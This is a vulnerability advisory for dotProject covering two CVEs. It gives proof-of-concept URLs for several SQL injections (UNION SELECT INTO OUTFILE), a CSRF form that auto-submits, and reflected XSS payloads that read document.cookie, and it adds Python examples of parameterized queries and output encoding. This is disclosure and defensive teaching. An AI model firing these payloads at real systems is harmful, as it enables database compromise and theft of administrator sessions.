High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in dotProject, which can be exploited to perform SQL injection and cross-site scripting (XSS) attacks.

1) SQL Injection in dotProject: CVE-2012-5701

High-Tech Bridge Security Research Lab has discovered multiple SQL injection vulnerabilities in the dotProject administrative interface. A remote authenticated administrator can execute arbitrary SQL commands in the application's database. These vulnerabilities could also be exploited by a remote non-authenticated attacker via a CSRF vector, since the application is prone to cross-site request forgery attacks. In order to do so, an attacker would have to trick a logged-in administrator into visiting a web page containing the CSRF exploit.

1.1 The vulnerability exists due to insufficient sanitization of input passed via the "search_string" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on database and system configuration, this PoC code will create a /tmp/file.txt file containing the MySQL server version:

http://[host]/index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202

The second PoC demonstrates exploitation of the same vulnerability via a CSRF vector:

<form action="http://[host]/index.php" method="GET" name="F1">
<input type="hidden" name="m" value="contacts">
<input type="hidden" name="search_string" value="0') UNION SELECT version(),2,3,4,5,6,7,8,9,10,11 INTO OUTFILE '/tmp/file.txt' -- 2">
</form>
<script>
document.F1.submit();
</script>

1.2 The vulnerability exists due to insufficient sanitization of input passed via the "where" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.
Depending on database and system configuration, this PoC code will create a /tmp/file.txt file containing the MySQL server version:

http://[host]/index.php?m=contacts&where=%27%29%20UNION%20SELECT%20version(),2,3,4,5,6,7,8,9,10,11%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202

1.3 The vulnerability exists due to insufficient sanitization of input passed via the "dept_id" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on database and system configuration, this PoC code will create a /tmp/file.txt file containing the MySQL server version:

http://[host]/index.php?m=departments&dept_id=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202

Successful exploitation of vulnerabilities 1.1 – 1.3 requires that "magic_quotes_gpc" is set to "off" in php.ini.

1.4 The vulnerability exists due to insufficient sanitization of input passed via the "project_id" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on database and system configuration, this PoC code will create a /tmp/file.txt file containing the MySQL server version:

http://[host]/?m=projects&update_project_status=1&project_status=1&project_id[]=%27%20UNION%20SELECT%20version%28%29%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202

1.5 The vulnerability exists due to insufficient sanitization of input passed via the "company_id" HTTP GET parameter to the index.php script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on database and system configuration, this PoC code will create a /tmp/file.txt file containing the MySQL server version:

http://[host]/?m=system&a=billingcode&company_id=0%20UNION%20SELECT%201,2,3,4,5,6%20INTO%20OUTFILE%20%27/tmp/file.txt%27%20--%202
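The root cause of 1.1 through 1.5 is the same: a GET parameter is concatenated into the SQL text, so a quote or closing parenthesis in the value ends the literal and the remainder is parsed as SQL. The following Python is an added illustration, not dotProject's code: the table, its columns and the search query are assumptions, SQLite stands in for MySQL, and the payload is only shaped like the advisory's (quote, parenthesis, UNION, comment) to show why the vulnerable form returns a row the table never held while the parameterized form treats the same value as plain text. It also shows an allowlist check for the numeric id parameters (dept_id, company_id, the list-valued project_id[]). Note that the magic_quotes_gpc precondition named above is not a mitigation to rely on: that setting was removed in PHP 5.4, and bound parameters are the fix regardless of its value.

```python
import re
import sqlite3

# Constructed sample rows standing in for dotProject's contacts table.
# Assumption: the real schema differs; only the injection mechanics matter here.
CONTACTS = [
    (1, "Alice", "alice@example.test"),
    (2, "Bob", "bob@example.test"),
]
SQLITE_VERSION = sqlite3.sqlite_version  # what an injected sqlite_version() returns


def make_db():
    """In-memory SQLite database (stand-in for MySQL) loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (contact_id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?, ?)", CONTACTS)
    return conn


def search_contacts_vulnerable(conn, search_string):
    """Hypothetical vulnerable pattern: the GET parameter is pasted into the SQL text,
    so a quote and a closing parenthesis in the value escape the literal and the rest
    of the string is parsed as SQL. Kept only to contrast with the safe version."""
    sql = "SELECT name, email FROM contacts WHERE (name LIKE '%" + search_string + "%')"
    return conn.execute(sql).fetchall()


def search_contacts_safe(conn, search_string):
    """Bound parameter: the value travels separately from the SQL text, so quotes,
    parentheses and keywords inside it are matched as literal characters."""
    sql = "SELECT name, email FROM contacts WHERE name LIKE ?"
    return conn.execute(sql, ("%" + search_string + "%",)).fetchall()


def demonstrate_search():
    """Run a payload shaped like the advisory's through both functions. The vulnerable
    one returns a row the table never contained (the database version, the same data
    the advisory's PoC writes to a file); the safe one returns nothing."""
    payload = "0') UNION SELECT sqlite_version(), 'injected' -- "
    conn = make_db()
    return {
        "vulnerable": search_contacts_vulnerable(conn, payload),
        "safe": search_contacts_safe(conn, payload),
    }


ID_RE = re.compile(r"[0-9]{1,10}")


def is_valid_id(value):
    """Allowlist check for id parameters (dept_id, company_id, project_id[]):
    only a plain non-negative integer is accepted; anything else is rejected."""
    return isinstance(value, str) and ID_RE.fullmatch(value) is not None


def contacts_by_ids_safe(conn, raw_values):
    """Typed validation plus one placeholder per id, which is how a list-valued
    parameter such as project_id[] is bound without string building."""
    if not all(is_valid_id(v) for v in raw_values):
        raise ValueError("rejected non-numeric id parameter")
    ids = [int(v) for v in raw_values]
    if not ids:
        return []
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT name, email FROM contacts WHERE contact_id IN (%s) "
           "ORDER BY contact_id" % placeholders)
    return conn.execute(sql, ids).fetchall()


if __name__ == "__main__":
    print(demonstrate_search())
    print(contacts_by_ids_safe(make_db(), ["2", "1"]))
```

The same two rules cover every item in this section: data values (search_string, where) are bound, never concatenated, and identifiers that must be integers are validated against an allowlist before they reach the query.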
2) Cross-Site Scripting (XSS) in dotProject: CVE-2012-5702

High-Tech Bridge Security Research Lab has discovered multiple cross-site scripting vulnerabilities in the dotProject administrative interface.

2.1 An input sanitization error was found in the index.php script when handling the "callback" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in the administrator's browser in the context of an affected website. The following PoC demonstrates the vulnerability:

http://[host]/?m=public&a=color_selector&callback=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2.2 An input sanitization error was found in the index.php script when handling the "field" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in the administrator's browser in the context of an affected website. The following PoC demonstrates the vulnerability:

http://[host]/?m=public&a=date_format&field=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2.3 An input sanitization error was found in the index.php script when handling the "company_name" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in the administrator's browser in the context of an affected website. The following PoC demonstrates the vulnerability:

http://[host]/index.php?m=contacts&a=addedit&contact_id=0&company_id=1&company_name=%22%20onmouseover=%22javascript:alert%28document.cookie%29%22

2.4 An input sanitization error was found in the index.php script when handling the "date" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in the administrator's browser in the context of an affected website. The following PoC demonstrates the vulnerability:

http://[host]/index.php?a=day_view&date=%22%20onmouseover=%22javascript:alert%28document.cookie%29%22
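The four XSS issues fall into two output contexts, as the PoC shapes show: 2.1 and 2.2 land inside a script block (the payload closes it with </script> and opens a new one), while 2.3 and 2.4 land inside a double-quoted attribute (the payload closes the value and adds an onmouseover handler). The fix differs per context, which is the point of this added Python example; it is not dotProject's code, the markup it emits is assumed, and so is the assumption that "callback" is used as a JavaScript function name and "field" as a string value. A callback name cannot be made safe by encoding, so it is validated against an identifier allowlist; a string placed in script context is JSON-encoded with angle brackets additionally escaped; attribute values are HTML-encoded with quotes escaped.

```python
import html
import json
import re

# Strict allowlist for a JavaScript callback name: identifier characters only, with
# dotted names permitted (assumption: a real callback would be a plain function name).
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*")


def is_safe_callback(name):
    """Script-context value used as code (the 'callback' parameter): validation is the
    only option, since no encoding turns attacker text into a harmless function name."""
    return isinstance(name, str) and len(name) <= 64 and CALLBACK_RE.fullmatch(name) is not None


def render_callback_script(callback):
    """Emit the callback invocation only after the allowlist check (markup assumed)."""
    if not is_safe_callback(callback):
        raise ValueError("rejected callback name")
    return "<script>%s(selectedColor);</script>" % callback


def js_string_literal(value):
    """Script-context value used as data (the 'field' parameter): JSON-encode it and
    additionally escape '<' and '>' so a value containing '</script>' cannot terminate
    the script block that embeds it. The browser's JS parser decodes \\u003c back to '<',
    but the HTML parser never sees a closing tag."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_attr(name, value):
    """Attribute context (the 'company_name' and 'date' parameters): HTML-encode with
    quotes escaped so the value cannot close the attribute and start a new one such as
    onmouseover. The attribute itself is always written with double quotes."""
    return '%s="%s"' % (name, html.escape(value, quote=True))


def render_contact_form(company_name):
    """Hypothetical add/edit form field (markup assumed) using the attribute encoder."""
    return '<input type="text" name="company_name" %s>' % render_attr("value", company_name)


def render_field_script(field):
    """Hypothetical date_format script (markup assumed) using the JS string encoder."""
    return "<script>var field = %s;</script>" % js_string_literal(field)


if __name__ == "__main__":
    print(render_contact_form('" onmouseover="javascript:alert(document.cookie)"'))
    print(render_field_script("</script><script>alert(document.cookie);</script>"))
    print(is_safe_callback("</script><script>alert(document.cookie);</script>"))
```

Encoding must be chosen per context at the point of output: an HTML encoder applied to the callback value would not stop the 2.1 payload, because the value is executed as code rather than rendered as text, and an attribute encoder that leaves quotes alone would not stop 2.3 or 2.4.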